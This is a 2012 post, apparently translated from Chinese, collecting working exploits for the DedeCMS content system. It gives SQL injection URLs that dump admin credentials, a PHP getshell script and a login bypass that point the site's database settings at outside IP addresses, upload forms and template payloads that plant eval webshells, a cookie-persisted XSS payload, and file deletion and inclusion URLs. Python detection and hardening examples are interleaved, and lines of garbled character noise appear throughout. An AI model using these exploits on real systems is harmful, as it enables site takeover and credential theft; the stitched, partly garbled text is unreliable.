
DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14
DedeCMS 5.6 rss.php injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account, upload a piece of software and put the following into the local address field: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly.

DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; it triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar block URL-based XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, visiting any of the URLs below triggers our XSS no matter how it is reached.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DedeCMS variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCMS v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

This vulnerability requires knowing the backend path first.

8 j4 ]' m) y1 h3 ^( |6 T5 Z' ^) X
  p( H; t5 ?+ o: J
3 v! B$ Z0 U2 M! g: S
& Z" ]( {0 S3 h4 b
! [' i2 V9 Q+ |% z+ ]* \. `' o3 I
) x( v% J; J% {; R3 V" S9 i0 F

  w" C4 \4 ]  a, |& e1 \# l. k6 H8 n5 f7 O+ v& n3 K# C/ S

DedeCMS tag remote file write vulnerability
Precondition: you must have your own DedeCMS database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit the form below; the shell is 1.php in the same directory. Work out the mechanism yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
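The variable-override getshell script, the login.php bypass and the mytag_js.php form above all rely on the same defect: DedeCMS registered every request parameter as a PHP variable, so a name such as `_COOKIE[GLOBALS][cfg_dbhost]` or `_POST[GLOBALS][cfg_dbuser]` silently replaced the database configuration (the select_soft_post.php form further down abuses the same loop with plain `cfg_*` names). The Python below is an added example of mine, not code from this post or from DedeCMS: a name-level rejection modelled on the `Request var not allow!` check that later DedeCMS releases added to include/common.inc.php (the `_SERVER`, `_FILES`, `_REQUEST`, `_SESSION` and `_ENV` names are my addition to that list), plus an access-log scan for the request shapes shown in this post. The log lines, IP addresses and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote, parse_qsl

# Request-variable names that must never reach a `${$name} = $value` loop.
# Modelled on the name check later DedeCMS releases added to common.inc.php;
# the superglobals after _COOKIE are my own additions to that list.
FORBIDDEN_NAME = re.compile(
    r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_SERVER|_FILES|_REQUEST|_SESSION|_ENV)")


def forbidden_var_names(params):
    """Return the names in `params` (an iterable of (name, value) pairs from the
    query string, POST body or cookie jar) that would override configuration or
    superglobals if registered as PHP variables.  Only the name matters: the
    override happens before any value is looked at."""
    bad = []
    for name, _value in params:
        root = name.split("[", 1)[0]   # "_COOKIE[GLOBALS][cfg_dbhost]" -> "_COOKIE"
        if FORBIDDEN_NAME.match(root):
            bad.append(name)
    return bad


def forbidden_in_query(query_string):
    """Same check applied to a raw query string or URL-encoded POST body."""
    return forbidden_var_names(parse_qsl(query_string, keep_blank_values=True))


# Access-log signatures for the request shapes shown in this post.  Matching is
# done on the URL-decoded request target so %5B/%5D or %28 do not hide a hit.
LOG_SIGNATURES = {
    "globals_override": re.compile(r"(?:^|[?&;])(?:_COOKIE|_POST|_GET|GLOBALS)\[", re.I),
    "advancedsearch_raw_sql": re.compile(r"/plus/advancedsearch\.php\?.*\bsql=", re.I),
    "rss_updatexml": re.compile(r"/plus/rss\.php\?.*updatexml\(", re.I),
    "gotopage_script": re.compile(r"gotopage=.*<script", re.I),
    "mysql_error_trace_read": re.compile(r"/data/mysql_error_trace\.php", re.I),
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Return (line_number, signature_name) for every signature hit, 1-based."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = unquote(m.group("target"))
        for sig_name, pattern in LOG_SIGNATURES.items():
            if pattern.search(target):
                hits.append((number, sig_name))
    return hits


# Constructed sample log (RFC 5737 documentation addresses); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23][0]=1 HTTP/1.1" 500 312
203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 1024
203.0.113.9 - - [18/Oct/2012:10:43:01 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 88
203.0.113.9 - - [18/Oct/2012:10:43:05 +0800] "GET /dede/login.php?dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=203.0.113.1 HTTP/1.1" 302 0
198.51.100.7 - - [18/Oct/2012:10:44:00 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3E HTTP/1.1" 200 4096
198.51.100.8 - - [18/Oct/2012:10:45:00 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 8192
203.0.113.9 - - [18/Oct/2012:10:46:00 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for number, sig in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"line {number}: {sig}")
    print(forbidden_in_query("doaction=x&_COOKIE[GLOBALS][cfg_dbhost]=h&nocache=true"))
```

Line 3 of the sample log (the POST to mytag_js.php) produces no hit even though its body carries the `_COOKIE[GLOBALS]` override: access logs record only the request line, so body-based variants are visible only where the check runs inside the application or in a WAF that inspects POST bodies. The name check catches them regardless of transport because it rejects on the variable name before any value is used.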
" w7 P, @/ p  G0 ~) X% l/ I( N8 @5 u- X5 N

9 v/ ~8 M; I7 h# N4 q; w
- P7 e9 \6 N' P# O' M8 j( |) M; U2 K2 r- y, t
, T! x5 ^/ b( j# y/ N

$ G& F$ i0 n$ l/ Q' e8 D
5 \5 t/ i1 v/ z# L2 h  c! @) C8 t8 D: G) P

/ o' {8 j/ K5 ]
5 b9 w8 s1 E' q( Z3 VDedeCms v5.6 嵌入恶意代码执行漏洞/ R# K8 D% `+ x' W. C% X7 s. E
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行: A/ g5 E; Q( \: k2 i/ w' t! S( k
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
, P6 D* J7 b" D) \) z4 J生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得& z' {+ F( R9 T# ?# k# ?& b8 u
DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member centre, publish an article and upload an image; then in attachment management replace the image with our carefully crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prefix it with gif89a if the image format is restricted):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(crafted here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the edited article's aid is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

4 ?5 n8 z# F6 @
6 K3 r( g: Z3 t7 ~* z  e0 g) c# L, m5 i# k0 i0 d

- x  e$ K& R3 u
* b& @9 r: ]  f+ Q
9 N8 R: D. _' G# t& G1 c2 [- X2 j. ^* ?0 w+ H5 e. A, [
. j8 d- e% Y0 n* z
) }6 S! Z; z  @5 Y
; R0 V2 D9 w7 Y) T5 R
8 x6 \" n* y! ~8 @
: I* @/ }9 o: C, z, B
DedeCMS website management system get-shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after upload the image is stored as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
DedeCMS V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
DedeCMS V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
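The edit_face.php delete above and the carbuyaction.php include are missing the same step: the client-supplied path is used before it is normalized and confined to the directory the member is allowed to touch. The Python below is an added example of mine, not DedeCMS code; it assumes a document root of /var/www/html and a constructed allowlist of payment module names, and uses the post's own `oldface` value as the rejected input.

```python
import posixpath
import re

WEB_ROOT = "/var/www/html"          # assumption: the DedeCMS document root


def resolve_under(base_dir, client_path):
    """Normalize a client-supplied, web-root-relative path and return the
    absolute path only when it stays inside `base_dir`; otherwise None.
    A leading '/' is treated as relative to the web root, the way upload paths
    are stored; '..' segments are collapsed by normpath before the containment
    check, which is exactly the step the vulnerable delete skipped."""
    if "\x00" in client_path:        # NUL truncation: reject outright
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, client_path.lstrip("/")))
    base = posixpath.normpath(base_dir)
    # The trailing "/" stops /userup/8 from matching /userup/80.
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


def face_delete_target(uid, oldface):
    """edit_face.php-style check: a member may only delete files inside their
    own uploads/userup/<uid>/ directory.  Returns the path to unlink or None."""
    own_dir = posixpath.join(WEB_ROOT, "uploads", "userup", str(uid))
    return resolve_under(own_dir, oldface)


# Constructed allowlist; a real install should derive it from the payment
# module files actually present, never from user input.
ALLOWED_PAYMENT_CODES = frozenset({"alipay", "tenpay", "cod"})
CODE_RE = re.compile(r"[a-z0-9_]{1,32}")


def safe_payment_code(code, allowed=ALLOWED_PAYMENT_CODES):
    """carbuyaction.php-style check: the `code` that selects an include file is
    an identifier, never a path.  Returns the code or None."""
    if CODE_RE.fullmatch(code) and code in allowed:
        return code
    return None


if __name__ == "__main__":
    # The post's traversal value, bound to member 8.
    print(face_delete_target(8, "/uploads/userup/8/../../../member/templets/images/m_logo.gif"))
    print(face_delete_target(8, "/uploads/userup/8/myface.gif"))
    print(safe_payment_code("../../"), safe_payment_code("alipay"))
```

The containment check works on the normalized string, so it is independent of whether the target exists; combine it with an `os.path.realpath` check on the real filesystem where symlinks inside the upload directory are possible. The identifier check for `code` is stricter still: when the value only selects among known modules, there is no reason to let it participate in path construction at all.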
* j1 P: ]; y  [% Z* \' v# r7 C' R' `# C% C, |

5 U, O: `2 ^) K9 g; V7 X: s( D7 x# T9 G0 A
; i8 Y( `; ]. b; o) G

* u0 ^" A" X  n! A6 l1 A! W' {! \$ l. I
8 J1 y6 q; R8 B8 C/ c1 z
1 {. b7 I! r. R

. b  \0 ^0 t3 w3 e1 ~2 E0 C# L7 f2 I1 I
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving the 20-character MD5 password; to convert it, remove 3 more from the front and 1 from the back to get the 16-character MD5.
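The note above describes how dede_admin.pwd relates to a plain MD5: the 20-character stored form is the 32-character digest with 5 leading and 7 trailing characters removed, and dropping 3 more from the front and 1 from the back gives the usual 16-character MD5. The Python below is an added example of mine, not DedeCMS code; it carries that derivation through with `hashlib` so an auditor can recognise which of the three formats an exported table holds and validate a credential against any of them. The value for the password `admin` is computed by the code itself.

```python
import hashlib
import hmac
import re


def md5_hex(plaintext):
    return hashlib.md5(plaintext.encode("utf-8")).hexdigest()


def dede_admin_pwd(plaintext):
    """The 20-character form stored in dede_admin.pwd: the 32-character MD5
    with the first 5 and the last 7 characters removed, as the post states."""
    return md5_hex(plaintext)[5:-7]


def dede_pwd_to_md5_16(pwd20):
    """Convert the 20-character form to the conventional 16-character MD5 by
    dropping 3 leading and 1 trailing characters (the post's 'front minus 3,
    back minus 1')."""
    if not re.fullmatch(r"[0-9a-f]{20}", pwd20):
        raise ValueError("not a 20-character DedeCMS hash")
    return pwd20[3:-1]


def md5_16(plaintext):
    """Conventional 16-character MD5: characters 8..23 of the 32-character digest,
    which is what the two truncations above compose to."""
    return md5_hex(plaintext)[8:24]


def classify_stored_hash(value):
    """Tell an auditor which format a dede_admin.pwd / dede_member.pwd value uses.
    All three are unsalted MD5 truncations, so any of them is a finding."""
    if re.fullmatch(r"[0-9a-f]{32}", value):
        return "md5_32"
    if re.fullmatch(r"[0-9a-f]{20}", value):
        return "dede20"
    if re.fullmatch(r"[0-9a-f]{16}", value):
        return "md5_16"
    return "unknown"


def verify_password(candidate, stored):
    """Constant-time comparison of a candidate against a stored value in any of
    the three formats; used by a migration routine that re-hashes on login."""
    digest = md5_hex(candidate)
    expected = {
        "md5_32": digest,
        "dede20": digest[5:-7],
        "md5_16": digest[8:24],
    }.get(classify_stored_hash(stored))
    return expected is not None and hmac.compare_digest(expected, stored)


if __name__ == "__main__":
    stored = dede_admin_pwd("admin")
    print(stored, "->", dede_pwd_to_md5_16(stored), "==", md5_16("admin"))
    print(classify_stored_hash(stored), verify_password("admin", stored))
```

All three formats are unsalted MD5 truncations, so finding any of them in an exported table is a finding in itself: the hash can be tested offline at full MD5 speed, and the 20-character form discards nothing that matters for that. The practical remediation is to rotate the credentials and re-hash them with a salted, slow password hash on next login.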
, P6 x+ o6 ?$ ?. J  L8 w
2 J; C( c1 g% Q5 R6 D# @0 I3 C& c) Q& F6 Z
) u! ^, W* _) c1 U. G3 O

( _8 f9 G0 n2 e6 F  w  F) v* F" l" ]: [* M7 ?, r5 L  r9 c

* }) x' W1 x4 g
* S1 r7 G; g) }( ^% {8 P  |4 c
/ O% N+ B1 i/ {" d5 s% M
2 m6 B. s) Z5 [- F  C
8 m" H( f. v9 S" a$ j% @织梦(Dedecms) 5.1 feedback_js.php 注入漏洞3 s4 C5 O+ v  I2 y, O
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS recording database error messages in a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the file trojan was uploaded successfully.
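The digg_frame.php chain above works because the SQL error is written verbatim into data/mysql_error_trace.php, a file that is itself served as PHP and whose only protection is the comment block wrapped around the logged text. The Python below is an added illustration of mine, not DedeCMS code: it builds the file the way the step 2 output implies, shows that the post's `*/ ... ?>` tail ends the comment, and beside it a writer that neutralizes the terminator sequences. The error text and SQL are constructed to mirror the step 2 output.

```python
PHP_HEADER = "<?php\n/*\n"
PHP_FOOTER = "\n*/\n?>"


def vulnerable_trace_file(err, sql):
    """Layout the post's step 2 output implies: raw error text inside a PHP
    comment in a web-reachable .php file.  Nothing in the text is escaped."""
    return PHP_HEADER + "Error: " + err + "\nError sql: " + sql + PHP_FOOTER


def neutralize(text):
    """Break every byte sequence that can end the comment or re-enter PHP
    mode, so logged text can never become executable code."""
    return (text.replace("*/", "*\\/")
                .replace("?>", "?\\>")
                .replace("<?", "<\\?"))


def hardened_trace_file(err, sql):
    """Same layout, but the logged fields pass through neutralize() first."""
    return (PHP_HEADER + "Error: " + neutralize(err)
            + "\nError sql: " + neutralize(sql) + PHP_FOOTER)


def comment_closed_early(content):
    """True when the logged body contains a comment terminator or a PHP close
    tag, i.e. anything after it is parsed as PHP when the file is requested."""
    body = content[len(PHP_HEADER):len(content) - len(PHP_FOOTER)]
    return "*/" in body or "?>" in body


# Constructed sample mirroring the post's step 2 output; the tail after "; "
# stands in for the attacker-controlled part that arrived via the mid parameter.
SAMPLE_ERR = "Illegal double '1024e1024' value found during parsing"
SAMPLE_SQL = ("Select goodpost,badpost,scores From `dede_archives` "
              "where id=1024e1024 limit 0,1; */ var_dump(3); ?>")

if __name__ == "__main__":
    print("vulnerable closes comment early:",
          comment_closed_early(vulnerable_trace_file(SAMPLE_ERR, SAMPLE_SQL)))
    print("hardened closes comment early:",
          comment_closed_early(hardened_trace_file(SAMPLE_ERR, SAMPLE_SQL)))
```

Neutralizing `*/`, `?>` and `<?` keeps the file from executing, but the more robust fix is not to log into the web root as .php at all: write the trace to a plain-text file outside the document root (or one the web server is configured not to serve), since even the hardened file still discloses table names and queries to anyone who can fetch it.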
" m: F6 h5 `6 |1 g1 j$ y

6 `9 ^* M9 I  D: g2 n( ]7 l( A0 S' k+ o

* w7 m/ N" f5 n" t' B! O
' S# I$ [7 @0 N- r3 \1 V
5 f$ g7 ~7 k' w3 k
! A: _  r4 S% `% c! w1 ^( D& `* N: U& b* B

% U2 ?" ?0 a$ n+ }4 g$ P6 m: N, u/ \. t6 W" L& m4 T
6 F+ t+ W, ~. e! `3 x7 @6 h

DedeCMS plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*